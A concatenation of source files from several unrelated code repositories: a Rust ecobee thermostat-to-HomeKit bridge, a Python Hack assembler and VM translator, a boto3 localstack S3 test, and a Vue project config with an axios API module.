.map_err(|e| {
eprintln!("error occurred when refreshing token: {:?}", e);
});
Arbiter::spawn(refresh);
}
});
ctx.run_interval(Duration::from_secs(30), |actor, context| {
let addr = context.address();
let fut = actor
.get_thermostat()
.map(move |thermostat| {
if let Err(_) = addr.try_send(UpdateThermostat(thermostat)) {
eprintln!("send failed.");
}
})
.map_err(|e| {
eprintln!("error occurred when fetching thermostat: {:?}", e);
});
Arbiter::spawn(fut);
});
}
}
impl Handler<EcobeeQuery> for EcobeeActor {
type Result = Result<EcobeeResponse>;
fn handle(&mut self, _query: EcobeeQuery, _ctx: &mut Self::Context) -> Self::Result {
if let Some(thermostat) = self.thermostats.first() {
let mode: u8 = match &thermostat.settings.hvac_mode[..] {
"auto" => 3,
"cool" => 2,
"heat" => 1,
_ => 0,
};
let runtime = &thermostat.runtime;
let target: f32 = {
let heat = runtime.desired_heat as f32;
let cool = runtime.desired_cool as f32;
(heat + cool) / 20.0
};
let current: f32 = (runtime.temperature as f32) / 10.0;
let humidity: f32 = runtime.humidity as f32;
let target_humidity: f32 = runtime.desired_humidity as f32;
Ok(EcobeeResponse::Status(EcobeeStatus::new(
mode,
ftoc(target),
ftoc(current).round(),
humidity,
target_humidity / 100.0,
)))
} else {
Err(err_msg("no thermostat available"))
}
}
}
#[derive(Message)]
struct UpdateThermostat(ThermostatResponse);
impl Handler<UpdateThermostat> for EcobeeActor {
type Result = ();
fn handle(&mut self, update: UpdateThermostat, _: &mut Self::Context) -> Self::Result {
self.thermostats = update.0.thermostats;
}
}
#[derive(Message)]
struct SetAuthToken(AuthToken);
impl Handler<SetAuthToken> for EcobeeActor {
type Result = ();
fn handle(&mut self, request: SetAuthToken, _: &mut Self::Context) -> Self::Result {
println!("setting token to: {:?}", request.0);
self.auth_token = Some(request.0.clone());
}
}
pub enum ChangeThermostat {
HvacMode(u8),
Temperature(f32),
}
impl Message for ChangeThermostat {
type Result = Result<Box<Future<Item = (), Error = Error> + Send + 'static>>;
}
impl Handler<ChangeThermostat> for EcobeeActor {
type Result = Result<Box<Future<Item = (), Error = Error> + Send + 'static>>;
fn handle(&mut self, request: ChangeThermostat, _: &mut Self::Context) -> Self::Result {
if let Some(thermostat) = self.thermostats.first() {
match request {
ChangeThermostat::HvacMode(mode) => Ok(self
.set_hvac_mode(thermostat.identifier.clone(), mode)
.map(|_| ())
.boxify()),
ChangeThermostat::Temperature(temperature) => {
let temperature = (ctof(temperature) * 10.0) as u16;
let heat = temperature - 36;
let cool = temperature + 36;
Ok(self
.set_temperature(thermostat.identifier.clone(), heat, cool)
.map(|_| ())
.boxify())
}
}
} else {
Err(err_msg("no thermostat available"))
}
}
}
<file_sep>/src/main.rs
extern crate actix;
#[macro_use]
extern crate actix_derive;
extern crate actix_web;
extern crate clap;
#[macro_use]
extern crate failure;
extern crate futures;
extern crate http;
extern crate hyper;
extern crate hyper_tls;
extern crate serde;
#[macro_use]
extern crate serde_derive;
#[macro_use]
extern crate serde_json;
extern crate serde_urlencoded;
extern crate tokio;
extern crate toml;
mod config;
mod ecobee;
mod query;
mod response;
mod server;
use std::fs::File;
use std::io::Read;
use actix::Actor;
use clap::{App, Arg};
use failure::{err_msg, Error};
use ecobee::EcobeeActor;
const VERSION: &'static str = "0.0.1";
pub type Result<R> = std::result::Result<R, Error>;
fn build_clap<'a, 'b>() -> App<'a, 'b> {
clap::App::new("castform")
.version(VERSION)
.about("ecobee bridge to homekit")
.arg(
Arg::with_name("config")
.short("c")
.long("config")
.value_name("CONFIG_FILE")
.default_value("config.toml")
.help("path to config file"),
)
.arg(
Arg::with_name("host")
.short("H")
.long("host")
.value_name("HOST")
.default_value("127.0.0.1")
.help("HTTP host to listen to"),
)
.arg(
Arg::with_name("port")
.short("p")
.long("port")
.value_name("PORT")
.default_value("8351")
.help("HTTP port to listen to"),
)
}
fn main() -> Result<()> {
let system = actix::System::new("castform");
let matches = build_clap().get_matches();
let config = matches
.value_of("config")
.ok_or_else(|| err_msg("must provide config"))?;
let mut config = File::open(config)?;
let mut contents = String::new();
config.read_to_string(&mut contents)?;
let config = toml::from_str(&contents)?;
let ecobee =
EcobeeActor::from_config(&config).map(|actor| EcobeeActor::create(move |_| actor))?;
let server = actix_web::server::new(move || server::build_server_factory(ecobee.clone()));
let host = matches.value_of("host").unwrap();
let port = matches.value_of("port").unwrap();
let addr = format!("{}:{}", host, port);
let server = server.bind(addr.clone())?;
server.start();
println!("Starting HTTP server: http://{}", addr);
let _ = system.run();
Ok(())
}
<file_sep>/src/server.rs
use actix::Addr;
use actix_web::http::StatusCode;
use actix_web::server::{HttpHandler, HttpHandlerTask};
use actix_web::{http, middleware, App, Error, Form, HttpResponse, Json, State};
use failure::err_msg;
use futures::Future;
use ecobee::{ChangeThermostat, EcobeeActor};
use query::EcobeeQuery;
use response::{EcobeeResponse, EcobeeStatus};
#[derive(Clone)]
struct HttpServerState {
ecobee: Addr<EcobeeActor>,
}
#[derive(Deserialize)]
struct TemperatureForm {
temperature: f32,
}
#[derive(Deserialize)]
struct ModeForm {
state: u8,
}
fn status(state: State<HttpServerState>) -> impl Future<Item = Json<EcobeeStatus>, Error = Error> {
state
.ecobee
.send(EcobeeQuery::Status)
.map_err(|_| err_msg("mailbox error"))
.flatten()
.map(|resp: EcobeeResponse| match resp {
EcobeeResponse::Status(status) => Json(status),
})
.from_err()
}
fn set_heating_cooling_state(
(state, mode): (State<HttpServerState>, Form<ModeForm>),
) -> impl Future<Item = HttpResponse, Error = Error> {
state
.ecobee
.send(ChangeThermostat::HvacMode(mode.state))
.map_err(|_| err_msg("mailbox error"))
.flatten()
.flatten()
.map(|_: ()| {
HttpResponse::build(StatusCode::OK)
.content_type("text/html; charset=utf-8")
.body("done")
})
.map_err(|e| {
eprintln!("error: {:?}", e);
e
})
.from_err()
}
fn set_target_temperature(
(state, form): (State<HttpServerState>, Form<TemperatureForm>),
) -> impl Future<Item = HttpResponse, Error = Error> {
state
.ecobee
.send(ChangeThermostat::Temperature(form.temperature))
.map_err(|_| err_msg("mailbox error"))
.flatten()
.flatten()
.map(|_: ()| {
HttpResponse::build(StatusCode::OK)
.content_type("text/html; charset=utf-8")
.body("done")
})
.map_err(|e| {
eprintln!("error: {:?}", e);
e
})
.from_err()
}
pub fn build_server_factory(
ecobee: Addr<EcobeeActor>,
) -> impl IntoIterator<Item = Box<HttpHandler<Task = Box<HttpHandlerTask + 'static>> + 'static>> + 'static
{
let state = HttpServerState { ecobee };
vec![
App::with_state(state)
.middleware(middleware::Logger::default())
.resource("/status", |r| {
r.method(http::Method::GET).with_async(status)
})
.resource("/targetHeatingCoolingState", |r| {
r.method(http::Method::POST)
.with_async(set_heating_cooling_state)
})
.resource("/targetTemperature", |r| {
r.method(http::Method::POST)
.with_async(set_target_temperature)
})
.boxed(),
]
}
<file_sep>/src/query.rs
use actix::Message;
use response::EcobeeResponse;
use Result;
pub enum EcobeeQuery {
Status,
}
impl Message for EcobeeQuery {
type Result = Result<EcobeeResponse>;
}
<file_sep>/src/config.rs
#[derive(Deserialize)]
pub struct Config {
pub client_id: String,
pub username: String,
pub password: String,
}
<file_sep>/src/response.rs
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct EcobeeStatus {
target_heating_cooling_state: u8,
target_temperature: f32,
target_relative_humidity: f32,
current_heating_cooling_state: u8,
current_temperature: f32,
current_relative_humidity: f32,
}
impl EcobeeStatus {
pub fn new(
mode: u8,
target: f32,
current: f32,
humidity: f32,
target_humidity: f32,
) -> EcobeeStatus {
EcobeeStatus {
target_heating_cooling_state: mode,
target_temperature: target,
target_relative_humidity: target_humidity,
current_heating_cooling_state: mode,
current_temperature: current,
current_relative_humidity: humidity,
}
}
}
pub enum EcobeeResponse {
Status(EcobeeStatus),
}
|
5f2920903934b603a041bd63a0b496e0763c5cb2
|
[
"TOML",
"Rust"
] | 7
|
TOML
|
fanzeyi/castform
|
e367208c574b8cd50a1a6a12133be68b469710bf
|
d7f23dceb0a5a27bc6c3d415d566e4ba1b50572b
|
refs/heads/master
|
<file_sep># Qoala Devops Test Case 1
# Before you begin (Python >= 3.8)
## pipenv
### Install pipenv
If `pipenv` is not yet installed, please do by `brew install pipenv` or `pip install pipenv`.
To bootstrap the project after pipenv is installed, do `pipenv install`. To activate the python virtual environment use `pipenv shell`
### Activate python shell with pipenv
This project uses `pipenv` to manage the python environment. And should be initialized with `Python>=3.8` by doing:
`pipenv --python 3.8`
## pre-commit hook
This project also uses `pre-commit` hook to do autoformat with `black` and lint with `autopep8`. To initialize the `pre-commit`, please install by `brew install pre-commit` or `pip install pre-commit`, and then do `pre-commit` install
### Formatter
Uses `black`
### Linter
Uses `flake8`
### Mypy
This project uses mypy to have a typed hint and checks in the codebase. This will create the codebase to be more maintainable
### Vscode
There exists a `.vscode` folder that will contain the standard settings for this project that will configure the formatter and linter.
The default settings are:
```json
{
"editor.formatOnSave": true,
"python.linting.flake8Enabled": true,
"python.linting.enabled": true,
"python.formatting.provider": "black",
"python.linting.mypyEnabled": true
}
```
# Instructions:
## Create deployable app with docker & docker-compose
The project consists of boto3, mypy, black formatter bootstrapping and a main file `create_s3_bucket.py`
- Create Dockerfile to run the project that will run the file `create_s3_bucket.py`
- Run a localstack
- Create `docker-compose.yml` file that will setup the [localstack](https://github.com/localstack/localstack) as well as running the the dockerized project
- The expectation of this finished project is that running the `docker-compose up` will run the `create_s3_bucket.py` python file with the following logs:
- Success run log:
```
list buckets created: ['test1', 'test2']
list buckets after delete: []
```
- Failed run log:
```
Error: Could not connect to the endpoint URL: "http://localhost:4572/test1"
```
or any other errors not matching the success run log
Please fork this repository and share us the link to your repository when you're done.
You can extend any of the scripts to introduce some features such as creating an API out of this.
<file_sep>[[source]]
name = "pypi"
url = "https://pypi.org/simple"
verify_ssl = true
[dev-packages]
flake8 = "*"
black = "*"
pre-commit = "*"
mypy = "*"
boto3 = "*"
boto3-stubs = {extras = ["essential", "ecs", "elbv2"],version = "*"}
mypy_boto3 = "*"
[packages]
click = "*"
pyyaml = "*"
boto3 = "*"
[requires]
python_version = "3.8"
[pipenv]
allow_prereleases = true
<file_sep>.PHONY: clean lint
lint:
flake8 *.py<file_sep>import boto3
from mypy_boto3 import s3
try:
session = boto3.session.Session()
s3_client: s3.S3Client = session.client(
service_name="s3",
aws_access_key_id="123",
aws_secret_access_key="123",
endpoint_url="http://localhost:4572",
)
bucket_test1 = s3_client.create_bucket(Bucket="test1")
bucket_test2 = s3_client.create_bucket(Bucket="test2")
response = s3_client.list_buckets()
buckets = [bucket["Name"] for bucket in response["Buckets"]]
print(f"list buckets created: {buckets}")
if ["test1", "test2"] in buckets:
raise Exception("Test bucket not created")
s3_client.delete_bucket(Bucket="test1")
s3_client.delete_bucket(Bucket="test2")
response = s3_client.list_buckets()
buckets = [bucket["Name"] for bucket in response["Buckets"]]
print(f"list buckets after delete: {buckets}")
except Exception as e:
print(f"Error: {e}")
|
cb5e2eabc1f43ae62bec208d0880b0b988fabb42
|
[
"Markdown",
"TOML",
"Python",
"Makefile"
] | 4
|
Markdown
|
qoala-engineering/devops-test-case-1
|
90a86f1e39b2eaaecd11fd1954d56337682f0ace
|
6550551c597c5aefc18f319eaa27d4284495ba7c
|
refs/heads/master
|
<repo_name>TheCoderDream/Native-JS-Github-Profile-Searcher<file_sep>/app.js
const githubApiService = new GithubAPI();
const ui = new UI();
let toasterIsActive = true;
const searchUser = document.getElementById('searchUser');
document.addEventListener('DOMContentLoaded', () => {
searchUser.value = '';
});
searchUser.addEventListener('keyup', (e) => {
const userText = e.target.value;
if(userText) {
githubApiService.getUser(userText)
.then(data => {
if (data.profile.message && toasterIsActive) {
toasterIsActive = false;
ui.clearProfile();
Toaster('#toaster', 'User Not Found', 'danger', 3)
.then((isTrue) => {
toasterIsActive = isTrue;
});
} else if(!data.profile.message) {
console.log(data);
ui.showProfile(data.profile);
ui.showRepos(data.repos);
}
})
.catch(err => {
console.log(err);
})
} else {
ui.clearProfile();
}
});<file_sep>/githubAPIService.js
class GithubAPI {
constructor() {
this.client_id = '58106d38d809be3352a6';
this.client_secret = '<KEY>';
this.repos_count = 5;
this.repos_sort = 'created: asc'
}
async getUser(username) {
const profileResponse =
await fetch(
`https://api.github.com/users/${username}
?client_id=${this.client_id}
&client_secret=${this.client_secret}`);
const repoResponse =
await fetch(
`https://api.github.com/users/${username}
/repos?per_page=${this.repos_count}
&client_id=${this.client_id}
&sort=${this.repos_sort}
&client_secret=${this.client_secret}`);
const profile = await profileResponse.json();
const repos = await repoResponse.json();
return {
profile,
repos
}
}
}<file_sep>/README.md
# Native-JS-Github-Profile-Searcher

|
049f82ccb7579c90e970d8e193735c6d2309ea4f
|
[
"JavaScript",
"Markdown"
] | 3
|
JavaScript
|
TheCoderDream/Native-JS-Github-Profile-Searcher
|
bb9c8edef7dc05e6b4ce207cf4f3f3775ff2dbe7
|
7f425c680b5f1e48e131a77966f991cd44eefb18
|
refs/heads/master
|
<file_sep>import React, {Component} from 'react';
import {
StyleSheet,
Text,
View,
ScrollView,
TextInput,
TouchableOpacity,
Alert,
Image,
} from 'react-native';
import {getUser} from './../module/login/store/action';
import {connect} from 'react-redux';
import EmpImage from './../common/image/emp2.jpg';
// import { Avatar } from 'react-native-elements';
class EmployeeScreen extends Component {
constructor(props) {
super(props);
this.state = {
useData: [],
};
}
componentDidMount() {
this.props.getUser().then((response) => {
this.setState({
useData: response,
});
});
}
render() {
let itemList = this.state.useData.map((data) => {
return (
<View
style={{
justifyContent: 'center',
paddingTop: 13,
backgroundColor: '#ffff',
}}>
<View
style={{
height: 108,
flexDirection: 'row',
elevation: 4,
shadowOffset: {width: 5, height: 5},
shadowColor: 'red',
shadowOpacity: 0.5,
shadowRadius: 10,
backgroundColor: '#ede8e8',
marginBottom: 10,
marginHorizontal: 15,
paddingTop: 7,
}}>
<View style={{radius: 20, justifyContent: 'center'}}>
<Image
source={EmpImage}
style={{
width: 70,
height: 90,
marginLeft: 10,
resizeMode: 'stretch',
}}></Image>
</View>
<View>
<Text style={styles.text}>Name : {data.name}</Text>
<Text style={styles.text}>Age : {data.age}</Text>
<Text style={styles.text}>Gender : {data.gender}</Text>
<Text style={styles.text}>Email : {data.email}</Text>
<Text style={styles.text}>PhoneNo : {data.phoneNo}</Text>
</View>
</View>
</View>
);
});
return <ScrollView>{itemList}</ScrollView>;
}
}
const mapStateToProps = (state) => {
const {login} = state;
return {
login,
};
};
const mapDispatchToProps = ((dispatch) => ({
getUser,
}))();
export default connect(mapStateToProps, mapDispatchToProps)(EmployeeScreen);
const styles = StyleSheet.create({
text: {
fontFamily: 'serif',
alignItems: 'center',
marginLeft: 10,
fontSize: 13,
fontWeight: 'bold',
},
});
<file_sep>import axios from 'axios';
import * as actionType from './action-type';
const setLogin = (payload) => ({
type: actionType.SET_LOGIN,
payload,
});
export const getLogin = () => (dispatch) =>
new Promise((resolve) => {
try {
axios
.get('http://192.168.0.105:3000/login')
.then((response) => {
console.log('res', response);
//alert(response)
dispatch(setLogin(response.data));
resolve(response.data);
})
.catch((err) => {
console.log('err', err);
});
} catch {
alert('error');
}
});
const setUser = (payload) => ({
type: actionType.LIST_USER,
payload,
});
export const getUser = () => (dispatch) =>
new Promise((resolve) => {
try {
axios
.get('http://192.168.0.105:3000/empuser')
.then((response) => {
console.log('res', response);
//alert(response)
dispatch(setUser(response.data));
resolve(response.data);
})
.catch((err) => {
console.log('err', err);
});
} catch {
alert('error');
}
});
<file_sep>export const LIST_USER = '@user/list'
export const SET_LOGIN='@user/login'
|
e4910fcda1144cff88f68cd8f09a598def6788d0
|
[
"JavaScript"
] | 3
|
JavaScript
|
Navyasiddi/DemoLogin
|
35178ae97d9801ec3d40ccb8e0515de260ec768a
|
0b9bf7d5049a679f90a979bdf62d2dd74c6b5ead
|
refs/heads/master
|
<file_sep>import re
class Assembler(object):
def __init__(self,stringStream):
self.lines = stringStream.split()
self.output=""
self.symTable={
"SP":0,
"LCL":1,
"ARG":2,
"THIS":3,
"THAT":4,
"SCREEN":16384,
"KBD":24576
}
lineNumber=0
print("Building symbol table....")
for line in self.lines:
if line[0]=="(":
self.symTable[line[1:-1]]=lineNumber
else:
lineNumber+=1
print("Done building symbol table, building variable table...")
varIndex=16
for line in self.lines:
if line[0]=="@":
try:
if(line[1]!="R"):
int(line[1:])
else:
int(line[2:])
except:
if not line[1:] in self.symTable:
self.symTable[line[1:]]=varIndex
varIndex+=1
print("Done building variable table, assmebling.")
for line in self.lines:
if line[0]!="(":
self.output+=self.convertLine(line,lineNumber)
self.output+="\n"
if(len(self.output)!=0 and self.output[-1]=="\n"):
self.output=self.output[:-1]
def convertLine(self,line,lineNumber):
cBits = {
"0":"101010",
"1":"111111",
"0" : "101010",
"1" : "111111",
"-1" : "111010",
"D" : "001100",
"A" : "110000",
"!D" : "001101",
"!A" : "110001",
"-D" : "001111",
"-A" : "110011",
"D+1" : "011111",
"1+D" : "011111",
"A+1" : "110111",
"1+A" : "110111",
"D-1" : "001110",
"A-1" : "110010",
"D+A" : "000010",
"A+D" : "000010",
"D-A" : "010011",
"A-D" : "000111",
"D&A" : "000000",
"A&D" : "000000",
"D|A" : "010101",
"A|D" : "010101"
}
dBits = {
"M" : "001",
"D" : "010",
"MD" : "011",
"A" : "100",
"AM" : "101",
"AD" : "110",
"AMD" : "111",
}
jBits = {
"JGT" : "001",
"JEQ" : "010",
"JGE" : "011",
"JLT" : "100",
"JNE" : "101",
"JLE" : "110",
"JMP" : "111"
}
binaryLine=""
if line[0]=="@":
try:
aOut=bin(int(line[1:]))[2:]
except:
try:
aOut=bin(int(line[2:]))[2:]
except:
try:
aOut=bin(self.symTable[line[1:]])[2:]
except:
print(line[1:] + " **** threw error")
exit()
binaryLine+=aOut
while(len(binaryLine)<16):
binaryLine="0"+binaryLine
else:
binaryLine+="111"
lineArray=line.split("=")
opType="setOp"
aBit="1" if len(lineArray)==2 and re.search("M",lineArray[1]) else "0"
if(aBit=="1"):
lineArray[1]=lineArray[1].replace("M","A")
if(len(lineArray)==1):
lineArray=lineArray[0].split(";")
opType="jumpOp"
try:
cBit=cBits[lineArray[1 if opType=="setOp" else 0]]
except:
cBit="000000"
try:
dBit=dBits[lineArray[0 if opType=="setOp" else 1]]
except:
dBit="000"
try:
jBit=jBits[lineArray[1]]
except:
jBit="000"
binaryLine+=aBit+cBit+dBit+jBit
return binaryLine<file_sep># Name: <NAME>
# Course: CS410
# Assignment: PY02
# Due Date: 2/13/13
from Parser import Parser
from Assembler import Assembler
from CodeWriter import CodeWriter
import sys
if len(sys.argv)<3 or 4<len(sys.argv):
sys.exit("Usage: jacklex.py <input file> <output file> [-a]")
try:
fi=open(sys.argv[1], "r")
except:
sys.exit("Could not find input file!")
try:
fo=open(sys.argv[2], "w+")
except:
sys.exit("Could not open/create output file!")
if len(sys.argv)==3:
parseFile = Parser(fi.read(),False)
printmsg="Wrote output file to "+sys.argv[2]
outString=parseFile.output
parseFile.stats()
elif len(sys.argv)==4 and sys.argv[3]=="-a":
parseFile = Parser(fi.read(),False)
print("Done stripping comments, moving on to assembly steps.")
printmsg="Wrote assembled file to "+sys.argv[2]
assemFile=Assembler(parseFile.output)
outString=assemFile.output
elif len(sys.argv)==4 and sys.argv[3]=="-v":
parseFile = Parser(fi.read(),True)
print("Done stripping comments, moving on to interpreting steps.")
printmsg="Wrote interpreted file to "+sys.argv[2]
codeFile = CodeWriter(parseFile.output,sys.argv[1])
outString=codeFile.output
elif len(sys.argv)==4 and sys.argv[3]=="-va":
parseFile = Parser(fi.read(),True)
print("Done stripping comments, moving on to interpreting steps.")
codeFile=CodeWriter(parseFile.output,sys.argv[1])
parseFile=Parser(codeFile.output,False)
parsedCode=parseFile.output
print("Moving on to assembly steps.")
assemFile=Assembler(parsedCode)
printmsg="Wrote assembled and interpreted file to "+sys.argv[2]
outString=assemFile.output
else:
printmsg="Invalid parameters given."+"\n"+"Usage: jacklex.py <input file> <output file> [-a, -v]"
fo.write(outString)
fo.close()
sys.exit(printmsg)<file_sep>import sys
from string import Template
class CodeWriter(object):
def __init__(self,stringStream,fileName):
self.fileName=fileName.split(".")[0]
self.staticIndex=0
self.lines=stringStream.split("\n")
self.lines=[line.strip().lower() for line in self.lines]
self.output=""
self.genOutput()
def genOutput(self):
opCount=0
for line in self.lines:
lineArray=line.split(" ")
lineLower = lineArray[0].lower()
if False:
pass
elif lineLower=="push":
self.output+=self.opCodePUSH(lineArray)
elif lineLower=="pop":
self.output+=self.opCodePOP(lineArray)
elif lineLower=="add":
opDict = {'op':"+"}
self.output+=self.runTemplate("binary",opDict)
elif lineLower=="sub":
opDict = {'op':"-"}
self.output+=self.runTemplate("binary",opDict)
elif lineLower=="and":
opDict = {'op':"&"}
self.output+=self.runTemplate("binary",opDict)
elif lineLower=="or":
opDict = {'op':"|"}
self.output+=self.runTemplate("binary",opDict)
elif lineLower=="neg":
opDict={"op":"-"}
self.output+=self.runTemplate("unary",opDict)
elif lineLower=="not":
opDict={"op":"!"}
self.output+=self.runTemplate("unary",opDict)
elif lineLower=="eq":
opDict={'op':"EQ",'opInc':opCount}
self.output+=self.runTemplate("comp",opDict)
opCount+=1
elif lineLower=="gt":
opDict={'op':"GT",'opInc':opCount}
self.output+=self.runTemplate("comp",opDict)
opCount+=1
elif lineLower=="lt":
opDict={'op':"LT",'opInc':opCount}
self.output+=self.runTemplate("comp",opDict)
opCount+=1
def opCodePUSH(self,lineArray):
lineLower= lineArray[1].lower()
if lineLower=="constant":
opDict={'var':lineArray[2],'am':'A'}
output=self.runTemplate("push",opDict)
elif lineLower=="argument":
opDict={'var':"ARG",'x':lineArray[2]}
output=self.runTemplate("segment",opDict)
elif lineLower=="local":
opDict={'var':"LCL",'x':lineArray[2]}
output=self.runTemplate("segment",opDict)
elif lineLower=="static":
opDict={'var':(self.fileName+"."+str(self.staticIndex)),'am':"M"}
output=self.runTemplate("push",opDict)
self.staticIndex+=1
elif lineLower=="this":
opDict={'var':"THIS",'x':lineArray[2]}
output=self.runTemplate("segment",opDict)
elif lineLower=="that":
opDict={'var':"THAT",'x':lineArray[2]}
output=self.runTemplate("segment",opDict)
elif lineLower=="pointer":
opDict={'var':(int(lineArray[2])+3),'am':'M'}
output=self.runTemplate("push",opDict)
elif lineLower=="temp":
opDict={'var':(int(lineArray[2])+5),'am':'M'}
output=self.runTemplate("push",opDict)
return output+"\n"
def opCodePOP(self,lineArray):
lineLower= lineArray[1].lower()
if lineLower=="argument":
opDict={'var':"ARG",'x':lineArray[2]}
output=self.runTemplate("segpop",opDict)
elif lineLower=="local":
opDict={'var':"LCL",'x':lineArray[2]}
output=self.runTemplate("segpop",opDict)
elif lineLower=="static":
opDict={'var':(self.fileName+"."+str(self.staticIndex))}
output=self.runTemplate("pop",opDict)
self.staticIndex+=1
elif lineLower=="this":
opDict={'var':"THIS",'x':lineArray[2]}
output=self.runTemplate("segpop",opDict)
elif lineLower=="that":
opDict={'var':"THAT",'x':lineArray[2]}
output=self.runTemplate("segpop",opDict)
elif lineLower=="pointer":
opDict={'var':(int(lineArray[2])+3)}
output=self.runTemplate("pop",opDict)
elif lineLower=="temp":
opDict={'var':(int(lineArray[2])+5)}
output=self.runTemplate("pop",opDict)
return output+"\n"
def runTemplate(self,fileName,dict):
try:
fi=open(fileName+".tpl","r")
except:
sys.exit(fileName+".tpl not found!")
output=Template(fi.read()).substitute(dict)
return output<file_sep># Name: <NAME>
# Course: CS410
# Assignment: PY02
# Due Date: 2/13/13
import sys
class Parser(object):
def __init__(self,stringStream,vmMode):
self.vmMode=vmMode
self.fileIn=stringStream.split("\n")
self.fileIn = [line.strip() for line in self.fileIn]
self.lineIndex=0
self.lines=[len(self.fileIn),0]
self.characters=[-1,-1] #offset condition.
self.blockComments=[[0,0],[0,0]]
self.eolComments=[[0,0],[0,0]]
self.state=0
self.output=""
while self.hasMoreCommands():
self.advance()
def hasMoreCommands(self):
if (self.lineIndex>=(len(self.fileIn))):
self.outputFix()
return self.lineIndex<(len(self.fileIn))
def advance(self):
# TABLE OF STATES:
# 0 : NORMAL
# 1 : BEGINNING OF COMMENT
# 2 : LINE COMMENT
# 3 : BLOCK COMMENT
# 4 : END BLOCK COMMENT CHAR
# 5 : TAB OR SPACE
currLine = self.fileIn[self.lineIndex]
for c in currLine:
c=c.upper()
self.characters[0]+=1
#Ending line comments
if self.state==0:
if c=="/":
self.state=1
elif c==" " or c=="\t":
self.state=5 if self.vmMode else self.state
else:
self.output+=str(c)
self.characters[1]+=1
elif self.state==1:
if c=='/':
self.state=2
self.eolComments[0][0]+=1
elif c=='*':
self.blockComments[0][0]+=1
self.state=3
else:
self.output+="/"+str(c)
self.characters[0]+=1
self.characters[1]+=1
self.state=0
elif self.state==3:
self.blockComments[0][0]+=0 if self.hasMoreCommands() else 1 #Math adjustment for premature EOF
self.blockComments[0][1]+=1
if c=="*":
self.state=4
elif self.state==4:
if c=="/":
self.state=0
elif c=="*":#This accounts for a repeating asterisk condition.
self.state=4
else:
self.state=3
elif self.state==5:
if c!=" " and c!="\t":
if c=="/":
self.state=1
else:
self.output+=" "+str(c)
self.characters[1]+=2
self.state=0
self.state=0 if self.state==2 else self.state
self.output+="\n" if self.state==0 else ""
self.lines[1]+=1 if(self.state!=3) or (self.lineIndex==0) else 0
self.characters[0]+=0 if self.lineIndex== 0 else 1
self.characters[1]+=0 if self.state==0 else 1
self.blockComments[0][1]+=1 if self.state==3 else 0
self.lineIndex+=1
def outputFix(self):
output=self.output.split("\n")
self.output=""
for line in output:
if line!="":
self.output+=line
if line!=output[-1]:
self.output+="\n"
if(len(self.output)!=0 and self.output[-1]=="\n"):
self.output=self.output[:-1]
def stats(self):
print("\t\tINPUT\t\tOUTPUT")
print("Lines\t\t"+str(self.lines[0])+"\t\t"+str(self.lines[1]))
print("Characters\t"+str(self.characters[0])+"\t\t"+str(self.characters[1]))
print("Block Comments\t"+str(self.blockComments[0][0])+"\t\t"+str(self.blockComments[1][0]))
print(" Characters\t"+str(self.blockComments[0][1])+"\t\t"+str(self.blockComments[1][1]))
print("EOL Comments\t"+str(self.eolComments[0][0])+"\t\t"+str(self.eolComments[0][1]))
print(" Characters\t"+str(self.eolComments[1][0])+"\t\t"+str(self.eolComments[1][1]))
|
99fabfe3be2608b7c4135884e45cca81eb19b16d
|
[
"Python"
] | 4
|
Python
|
hubbazoot/ecs07
|
833e727d70e9c179cd30cdf24b75f79551a053b3
|
9bde72e587041525b82aebe3ae16b7d0cdd60e4b
|
refs/heads/master
|
<file_sep># Pokedex
Pokedex made with PokeAPI.
<file_sep>angular
.module('pokedexApp', ['ui.router'])
.controller('HomeController', HomeController)
.config(function($stateProvider, $urlRouterProvider) {
$urlRouterProvider.otherwise('/home');
$stateProvider
.state('home', {
url: '/home',
templateUrl: 'public/app/views/home/home.html'
});
});
function HomeController($http) {
var vm = this;
vm.name = "teste";
vm.getPokemonData = getPokemonData;
vm.idPokemon = 1;
vm.previous = previous;
vm.next = next;
vm.getPokemonData(vm.idPokemon);
function getPokemonData(pokemonId){
$http.get("http://pokeapi.co/api/v2/pokemon/"+ pokemonId).then(function(response) {
vm.pokeImageUrl = response.data.sprites.front_default;
vm.pokemonName = response.data.name;
vm.pokemonTypes = response.data.types;
});
}
function previous(){
if(vm.idPokemon >= 2){
vm.idPokemon--;
getPokemonData(vm.idPokemon);
}
}
function next(){
vm.idPokemon++;
getPokemonData(vm.idPokemon);
}
}
|
62b51e05399b22a7cbf95168e59a7306889e3ec7
|
[
"Markdown",
"JavaScript"
] | 2
|
Markdown
|
almermbn/pokeapi
|
b36611ebea1919e814b1ec5817f7601abaf028a5
|
4fb3c0618c09efa5740b0461be17f0c3f70d77bb
|
refs/heads/master
|
<repo_name>Julone/QianDianQM<file_sep>/vue.config.js
const CompressionWebpackPlugin = require('compression-webpack-plugin')
const productionGzipExtensions = ['js', 'css']
const UglifyJsPlugin = require('uglifyjs-webpack-plugin')
const webpack = require('webpack')
const isProduction = process.env.NODE_ENV === 'production'
module.exports = {
publicPath: './',
assetsDir: 'static',
devServer: {
proxy: {
'/api': {
target: 'http://localhost:3000/',
changeOrigin: true,
pathRewrite: {
'^/api': ''
}
},
}
},
configureWebpack: {
plugins: isProduction? [
// Ignore all locale files of moment.js
new webpack.IgnorePlugin(/^\.\/locale$/, /moment$/),
new UglifyJsPlugin({
uglifyOptions: {
compress: {
drop_debugger: true,
drop_console: true
},
},
sourceMap: false,
parallel: true
}),
// 配置compression-webpack-plugin压缩
new CompressionWebpackPlugin({
algorithm: 'gzip',
test: new RegExp('\\.(' + productionGzipExtensions.join('|') + ')$'),
threshold: 10240,
minRatio: 0.8
})
] : [],
externals: {
// 'vue': 'Vue',
// 'jquery' : '$',
}
},
}<file_sep>/src/views/Box/api.js
import axios from 'axios'
export const getRouterList = ({queryString}) =>{
return axios({
method:'get',
url: '/api/router-list',
params: {
queryString
}
})
}
export const postPreviewData = data => {
return axios({
method: 'post',
url: '/api/api/postPreviewData',
data: {data: data},
})
}
export const getPreviewData = data => {
return axios({
method: 'get',
url: '/api/api/getPreviewData',
})
}
export const postTemplateData = ({data,title}) => {
return axios({
method: 'post',
url: '/api/api/postTemplateData',
data: {data,title},
})
}
export const getTemplateData = templateID => {
return axios({
method: 'get',
url: '/api/api/getTemplateData',
params: {
templateID
}
})
}
export const getTemplateList = () => {
return axios({
method: 'get',
url: '/api/api/getTemplateList'
})
}
export const removeTemplate = (templateID)=>{
return axios({
method: 'post',
url: "/api/api/removeTemplateByID",
params: {
templateID
}
})
}
export const updateTemplate = (templateID,data) => {
return axios({
method: 'post',
url: "/api/api/updateTemplate",
data:{
data,
templateID,
}
})
}
export const getShopitemList = (params={})=>{
return axios({
